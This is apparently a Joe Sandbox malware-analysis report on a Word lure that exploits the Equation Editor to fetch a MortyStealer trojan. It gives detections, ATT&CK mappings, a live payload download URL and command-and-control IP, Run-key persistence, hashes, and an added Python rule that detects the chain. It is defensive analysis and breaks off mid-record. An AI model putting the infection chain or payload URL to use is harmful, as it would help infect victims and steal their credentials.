            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fiftikmernk852317.exe PID: 912, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (techniques with matched signatures, grouped by tactic). The number after each technique is the signature-count badge as extracted; where the rendered matrix showed several badges side by side their digits run together (e.g. 421).

Initial Access: no matched techniques
Execution: Native API (2), Exploitation for Client Execution (22), Command and Scripting Interpreter (1), Service Execution (2)
Persistence: Create Account (1), Windows Service (1)
Privilege Escalation: Access Token Manipulation (1), Windows Service (1), Process Injection (421)
Defense Evasion: Disable or Modify Tools (2), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (1), Masquerading (3), Virtualization/Sandbox Evasion (31), Access Token Manipulation (1), Process Injection (421), Hidden Files and Directories (1), Hidden Users (1)
Credential Access: OS Credential Dumping (2), Input Capture (21), Credentials In Files (1)
Discovery: System Time Discovery (1), System Service Discovery (1), File and Directory Discovery (4), System Information Discovery (25), Security Software Discovery (131), Virtualization/Sandbox Evasion (31), Process Discovery (2), Application Window Discovery (1), Remote System Discovery (1)
Lateral Movement: no matched techniques
Collection: Archive Collected Data (1), Input Capture (21)
Exfiltration: no matched techniques
Command and Control: Ingress Tool Transfer (33), Encrypted Channel (2), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (121)
Network Effects, Remote Service Effects: no matched techniques (mobile-matrix columns)
Impact: Endpoint Denial of Service (1)

The remaining matrix cells (Valid Accounts, Default Accounts, Logon Script, Scheduled Task/Job, Remote Services, NTDS, DCSync, the mobile Network Effects and Remote Service Effects techniques, and so on) are the matrix template and carry no signature for this sample; they are omitted above.
Behavior graph (image not included in this extract). Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.
Antivirus detection: submitted file
Source | Detection | Scanner | Label
New Order ( MY 01-22-DTHI .doc | 42% | Virustotal | -
New Order ( MY 01-22-DTHI .doc | 43% | Metadefender | -
New Order ( MY 01-22-DTHI .doc | 48% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
New Order ( MY 01-22-DTHI .doc | 100% | Avira | HEUR/Rtf.Malformed

Antivirus detection: dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | 100% | Avira | TR/AD.MortyStealer.obmwc
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe | 100% | Avira | TR/AD.MortyStealer.obmwc
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp | 100% | Avira | EXP/CVE-2018-0798.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe | 58% | ReversingLabs | Win32.Trojan.MortyStealer
C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | 58% | ReversingLabs | Win32.Trojan.MortyStealer

The vendors name different Equation Editor bugs (ReversingLabs tags the RTF as CVE-2017-11882, Avira tags the ~WRF temporary file as CVE-2018-0798); both are memory-corruption bugs in EQNEDT32.EXE, which is consistent with EQNEDT32.EXE being the process that downloaded and dropped the payload.

Antivirus detection: unpacked memory regions
Source | Detection | Scanner | Label
5.2.fiftikmernk852317.exe.242053f.4.unpack | 100% | Avira | TR/Patched.Ren.Gen3
5.2.fiftikmernk852317.exe.9a0000.0.unpack | 100% | Avira | TR/Redcap.ghjpt
8.2.cmd.exe.2930000.0.unpack | 100% | Avira | TR/Patched.Gen

The flagged region inside cmd.exe (process 8) is injected code, matching the Process Injection entries in the ATT&CK matrix.

Antivirus detection: domains
No Antivirus matches

Antivirus detection: URLs
Source | Detection | Scanner | Label
http://208.67.105.179/fifthikmerozx.exej | 100% | Avira URL Cloud | malware
76.8.53.133 | 10% | Virustotal | -
76.8.53.133 | 100% | Avira URL Cloud | malware
http://208.67.105.179/fifthikmerozx.exerrC: | 100% | Avira URL Cloud | malware
http://208.67.105.179/fifthikmerozx.exe. | 100% | Avira URL Cloud | malware
http://208.67.105.179/fifthikmerozx.exe | 100% | Avira URL Cloud | malware
http://www.piriform.co | 0% | Avira URL Cloud | safe
http://208.67.105.179/fifthikmerozx.exelateC: | 100% | Avira URL Cloud | malware

The variants ending in "exej", "exerrC:", "exe." and "exelateC:" are string-extraction artefacts: the same URL followed by whatever bytes sat next to it in the EQNEDT32.EXE memory dump. The indicator to block is http://208.67.105.179/fifthikmerozx.exe.
Contacted domains: no contacted domains info

Contacted URLs / IPs
Name | Malicious | Antivirus Detection | Reputation
76.8.53.133 | true | Virustotal 10%; Avira URL Cloud: malware | unknown
http://208.67.105.179/fifthikmerozx.exe | true | Avira URL Cloud: malware | unknown
URLs found in memory or binary data

http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000003.984768254.00000000004BB000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

http://208.67.105.179/fifthikmerozx.exej
Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmp
Malicious: true; Avira URL Cloud: malware; Reputation: unknown

http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000006.00000003.984768254.00000000004BB000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

https://github.com/syohex/java-simple-mine-sweeperC:
Source: fiftikmernk852317.exe, 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp
Malicious: false; Reputation: high

http://208.67.105.179/fifthikmerozx.exerrC:
Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmp
Malicious: true; Avira URL Cloud: malware; Reputation: unknown

http://208.67.105.179/fifthikmerozx.exe.
Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmp
Malicious: true; Avira URL Cloud: malware; Reputation: unknown

https://github.com/syohex/java-simple-mine-sweeper
Source: fiftikmernk852317.exe
Malicious: false; Reputation: high

http://www.piriform.co
Source: powershell.exe, 00000006.00000002.988213966.0000000000502000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Avira URL Cloud: safe; Reputation: unknown

http://208.67.105.179/fifthikmerozx.exelateC:
Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmp
Malicious: true; Avira URL Cloud: malware; Reputation: unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
76.8.53.133 | unknown | United States | 17185 | QUONIXNET, US | true
208.67.105.179 | unknown | United States | 20042 | GRAYSON-COLLIN-COMMUNICATIONS, US | true
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:679658
Start date and time: 2022-08-06 08:56:52 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 20s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:New Order ( MY 01-22-DTHI .doc
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.phis.troj.spyw.expl.evad.winDOC@9/11@0/2
                    EGA Information:
                    • Successful, ratio: 75%
                    HDC Information:
                    • Successful, ratio: 37.4% (good quality ratio 35.7%)
                    • Quality average: 81.1%
                    • Quality standard deviation: 27.4%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Adjust boot time
                    • Enable AMSI
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.189.173.21, 104.208.16.93, 20.42.65.92
                    • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, watson.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, legacywatson.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 1036 because there are no executed function
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:58:15 | API Interceptor | 108x Sleep call for process: EQNEDT32.EXE modified
08:58:56 | API Interceptor | 12x Sleep call for process: powershell.exe modified
08:58:58 | API Interceptor | 628x Sleep call for process: cmd.exe modified
08:58:59 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value "windowsfile" = C:\Users\user\AppData\Roaming\fiftikmernk852317.exe

The Run value is the persistence mechanism recorded for this sample; a cleanup has to delete both the registry value and the file it points to (plus the identical copy in the IE cache listed under dropped files).
                    No context
Dropped file: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe (path taken from the antivirus table: the IE cache copy written when EQNEDT32.EXE fetched the URL below; hashes identical to the AppData\Roaming copy further down)
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:downloaded
                    Size (bytes):2358784
                    Entropy (8bit):2.646635659437136
                    Encrypted:false
                    SSDEEP:6144:5633nN00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+8Jk7UBj7A0:5633+D4pa7+o
                    MD5:5AE8471C10CDB2A59B950E66F8CA8A46
                    SHA1:284F5B01A3D7F404DCD9B5346D1A67A9DE0E9C6B
                    SHA-256:2A83A969BE112352798176D1769378C9D3330799051DF12114B1BB8D7EF0BFB5
                    SHA-512:C872B2B93BC0CE74B89DC1F8A54FA4E5356A668FD3C406EE62EB63FEEEF93E03AD59D5B23B841287A2BB0ADEF54699049F3CC7C9CDD7EA2A91253DACBA4E0344
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Reputation:low
                    IE Cache URL:http://208.67.105.179/fifthikmerozx.exe
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[V.n5..n5..n5.^04..n5.^06..n5.^01..n5.^00..n5......n5......n5..n4.}n5.F00..n5.F05..n5.F0...n5..n...n5.F07..n5.Rich.n5.................PE..L...*..b.....................n#.....:.............@..........................P$...........@.....................................,.....!.....................@$..... ...............................@...@...............T............................text............................... ..`.rdata...4.......6..................@..@.data..... ....... .................@....gfids..`.....!......b!.............@..@.tls..........!......d!.............@....rsrc........!......f!.............@..@.reloc.......@$.......#.............@..B................................................................................................................................................................................................................
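The timeline entry above (a Run value under HKLM pointing at C:\Users\user\AppData\Roaming\fiftikmernk852317.exe) and this file record (a PE downloaded by EQNEDT32.EXE over HTTP) describe a chain that is easy to detect from endpoint telemetry: the Equation Editor has no reason to open a network connection, write an executable, or spawn a child, and an autostart value should not point into a user-writable directory. The following is an added example of that detection logic, not part of the Joe Sandbox report. The events are constructed Sysmon-style records (field names follow Sysmon's EventID, Image, ParentImage, TargetFilename, DestinationIp, TargetObject and Details) modelled on the report's process, file, registry and network facts; the regexes for autostart keys and user-writable paths are the example's own assumptions.

```python
"""Detection logic for the EQNEDT32.EXE download / drop / execute / Run-key chain.

Added example, not part of the Joe Sandbox report. SAMPLE_EVENTS are CONSTRUCTED
Sysmon-style records modelled on the report (paths, IP, port and Run value name
are taken from it); they are not real log lines from the analysis."""
import re
from dataclasses import dataclass

EQNEDT32 = "eqnedt32.exe"
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".com")

# Assumed patterns for the example: autostart keys and user-writable directories.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
USER_WRITABLE_RE = re.compile(
    r"\\AppData\\(Roaming|Local)\\|\\Users\\Public\\|\\ProgramData\\|\\Temp\\", re.I)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass(frozen=True)
class Alert:
    rule: str
    stage: str   # download / drop / execute / persist
    detail: str


def detect(events):
    """Apply four rules to Sysmon-style events; return the alerts raised, in event order."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        if eid == 3 and image == EQNEDT32:
            # Sysmon 3 (network connection): the Equation Editor never needs the network.
            alerts.append(Alert("EQNEDT32 network connection", "download",
                                f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
        elif eid == 11 and image == EQNEDT32 and ev["TargetFilename"].lower().endswith(PE_EXTENSIONS):
            # Sysmon 11 (file create): EQNEDT32 writing an executable.
            alerts.append(Alert("EQNEDT32 writes PE file", "drop", ev["TargetFilename"]))
        elif eid == 1 and parent == EQNEDT32:
            # Sysmon 1 (process create) with EQNEDT32 as parent.
            alerts.append(Alert("EQNEDT32 spawns child process", "execute", ev["Image"]))
        elif eid == 13 and RUN_KEY_RE.search(ev["TargetObject"]) and USER_WRITABLE_RE.search(ev["Details"]):
            # Sysmon 13 (registry value set): Run value whose target lives in a user-writable path.
            alerts.append(Alert("Run key points into user-writable path", "persist", ev["Details"]))
    return alerts


def chain_complete(alerts):
    """True when every stage of the download-drop-execute-persist chain was observed."""
    return {"download", "drop", "execute", "persist"} <= {a.stage for a in alerts}


# Constructed sample events (see module docstring). Two benign Word events and one benign
# Run value under Program Files are included to show what does not alert.
EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DROP = r"C:\Users\user\AppData\Roaming\fiftikmernk852317.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": WORD, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 11, "Image": WORD, "TargetFilename":
        r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp"},
    {"EventID": 3, "Image": EQ, "DestinationIp": "208.67.105.179", "DestinationPort": 80},
    {"EventID": 11, "Image": EQ, "TargetFilename": DROP},
    {"EventID": 1, "Image": DROP, "ParentImage": EQ},
    {"EventID": 13, "Image": DROP,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windowsfile",
     "Details": DROP},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Program Files\Vendor\updater.exe"},
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.stage:8}] {a.rule}: {a.detail}")
    print("full chain observed:", chain_complete(found))
```

Run against the constructed events, the four malicious records each raise one alert and the three benign ones raise none; chain_complete() is the correlation step, so a single stage (a stray Run value) stays a low-severity hit while all four together warrant an incident. On a real host the process-create rule would also catch the cmd.exe and powershell.exe children recorded in the timeline above.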
Dropped file: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp (path taken from the antivirus table, where Avira labels it EXP/CVE-2018-0798.Gen: the temporary file Word writes for the embedded Equation object)
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):5632
                    Entropy (8bit):3.9463825602375584
                    Encrypted:false
                    SSDEEP:48:rKQ0MP7r2uYe5DxwTjnBCj+zcXKf0F4Goz:OrMP7rDYe51wTjBI/XF1+
                    MD5:7F8C7ADE3B301FEF960FE2ED1E65EBB1
                    SHA1:899D99088483240DDD1429CCB62394E58FCB9E6A
                    SHA-256:BC5CB0703E8ACB0C8A3F21388CDE72F4379F67EC342C610A19A4E369FB19142F
                    SHA-512:8184EF481E5B5577E1B074CF2EE4044C5D0DA68E8A93D21DB873FA20E4BC03053A57AA0495A92FF9A67306AA8107EDC4B52F37C71F022A18BF1D26AC87713CAF
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Reputation:low
                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):10272
                    Entropy (8bit):3.6137878983995697
                    Encrypted:false
                    SSDEEP:192:HELnaSTP2CC4YuwRmftbOxHisgHGOOiJtsFOX5OnFOMZyorE9FkjWqkFTGTLsBE4:HO2CC40RmhOxHiwOLEg5+kMprE9F27Et
                    MD5:603335A84876AA12660E550436F49463
                    SHA1:04BAD035D4A4AEE6921DE346A09634F3972905E3
                    SHA-256:624E7F983806EC35127CC2B22971EA4427EDCA079B983BB158165AB47B0CFE25
                    SHA-512:BC518CA365EF7A1DC29AB42FF1FF9D20206188AB916CB456DB536F179B742524F72D45BA0135D12D23E00A86524596AC9E9AA4489CA2068DCAF189E6CC863897
                    Malicious:false
                    Reputation:low
                    Preview:?.c.l.i.c.k. .e.n.a.b.l.e. .e.d.i.t.i.n.g. .t.o. .o.p.e.n. .i.n. .r.e.a.d.a.b.l.e. .f.o.r.m.a.t.'.?.?.7.!.?.;.|.`.$.].?.?.'...9.#.3.4.4.~.#.[.|...|.'.?.~.,.<.3.+.+.:...&.'.^.?.9.?.1...?.,.0.*.!.~.<.+.[.7.2.<.!.(.9.8.,.?.1...'.4.7.;.;.%.'.$.$.;.+.9.`.?.;.%.~.|.<.:...@.@.<...-.5.+.^...<.4...`.?.|.?.|.8.,.?.?.9.~.#.+.2.+.$...+.).7.?...`.5.>.?.1.?.(.?.6.:.^.2.?.'.%._.7.-.../._.@.0.`.3.?.2.;.3.3.-.8./.^.~.2...7.,.?.4.%.].[._.2.-.+._...0.?.!.^.0.4.,.%.%.?.&.9.9.?.].^.-.*...<.?...*.?.?.%.].;.!._.?.=.0.9.'.%./.7.?.#.,.].>.4.>.=.?.7.4.?.0.?.+.9.~...?.?./...5.&.|.6.&.=.%.-.%.?.5.5.'.)...%.9.>./.?.?.+.0.'.+...<.>.?.|.+.-...].#...%.|.?.~.3...`.<.:.~.?.9.?.3.[.+.].5...:...<.5.8.4.....>.@.'.6.!.8.;...4.=.!.?.|.7.5.0.;.?.=.'...&.7.3.;.-.>...3.[.?.;.`.6.&.$.%.[.#...0...?.,.%...0.|.`.;.'.?.[.!.&.0.5...6.*.=.*.%.?.^...6.6.<.=.1.?.0.%.7.2./.%.|.3.0.;.*.`.*.7.0.3...<.9.?.2.-.9.-.#.9.;.&.2.'.?.`.`.5.~.<.:.;.(.'.)...:...%.,.$.%.~.%.<.4.9.4./.4.?...*.@.?.:.:.4.1.$.?.].?.3.`.).`.0.2.8.#.(.$.:.1.0.0.(.8.?.6.-.
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Sat Aug 6 14:58:12 2022, length=11198, window=hide
                    Category:dropped
                    Size (bytes):1094
                    Entropy (8bit):4.564165251946446
                    Encrypted:false
                    SSDEEP:24:8Vt/XTRKJIctLJooehaOZJo3Dv3qNAu7D:8n/XT0BLJ/GTJPNA0D
                    MD5:C0714287529BC5BE397AE18F355E0016
                    SHA1:3BD54E065A9854A631FC5641B43883167E01D75C
                    SHA-256:53C440D247757EBB45B935DC38C5A826DD98DF7C1509A8CA0B8CDD57B8133B81
                    SHA-512:BD268D885C241595ADE0D220080F1194CAD44E2668B535E1324E23357B60A3761206001A7AE052E78A9827B1A8C1D39DA181C67A87B2217C99336793B48F4B8E
                    Malicious:false
                    Preview:L..................F.... ...6.K..3..6.K..3.....T.....+...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..+...UG. .NEWORD~1.DOC..j......hT..hT..*...r.....'...............N.e.w. .O.r.d.e.r. .(. .M.Y. .0.1.-.2.2.-.D.T.H.I. ...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\New Order ( MY 01-22-DTHI .doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w. .O.r.d.e.r. .(. .M.Y. .0.1.-.2.2.-.D.T.H.I. ...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):103
                    Entropy (8bit):4.873943194306733
                    Encrypted:false
                    SSDEEP:3:bDuMJlz+U3HIqXCmX1iU3HIqXCv:bC4Z3HR3Hm
                    MD5:74392C81A89548599B3B11D71F11044C
                    SHA1:86DA8462C95F3C7E86EB9FDCE8B6AA2AA03AA402
                    SHA-256:BCFC22DEFB5EA8D0A14D6C9965B65B27900229F90CEECA106F46B9FB46B5D81A
                    SHA-512:D8786A4C90F44D856D91A7BF9358D1790B7F984C2FC2B87F980FCC042A83FD8ED92DB5E0407C150355428C322E6C864288FC30010709B7C5906E810BF3D256E8
                    Malicious:false
                    Preview:[folders]..Templates.LNK=0..New Order ( MY 01-22-DTHI .LNK=0..[doc]..New Order ( MY 01-22-DTHI .LNK=0..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.5834415956890346
                    Encrypted:false
                    SSDEEP:96:chQCYMqRqvsqvJCwonAz8hQCYMqRqvsEHyqvJCwortAzgJKrUHEA6H6JlUVJAjp:c+soAz8+YHnorKzgwM6H6Ljp
                    MD5:6325751516F9AEA8661AEF15A581CBBF
                    SHA1:43C49C89157E43037F2293F86AE9283817607C70
                    SHA-256:EC1C84A2A7CF4D0991039F26B04B819CBBCE3EAD99EFE275C7FB93D4E85670B5
                    SHA-512:5241619762E71A38FA8CFA6BED33AE00325F61FD181F9FB7EE261E2FD2341415CD27E549656E34F027489A06473F99BFF30384BE5DF5EE1E3C73AF60291F77E8
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.5834415956890346
                    Encrypted:false
                    SSDEEP:96:chQCYMqRqvsqvJCwonAz8hQCYMqRqvsEHyqvJCwortAzgJKrUHEA6H6JlUVJAjp:c+soAz8+YHnorKzgwM6H6Ljp
                    MD5:6325751516F9AEA8661AEF15A581CBBF
                    SHA1:43C49C89157E43037F2293F86AE9283817607C70
                    SHA-256:EC1C84A2A7CF4D0991039F26B04B819CBBCE3EAD99EFE275C7FB93D4E85670B5
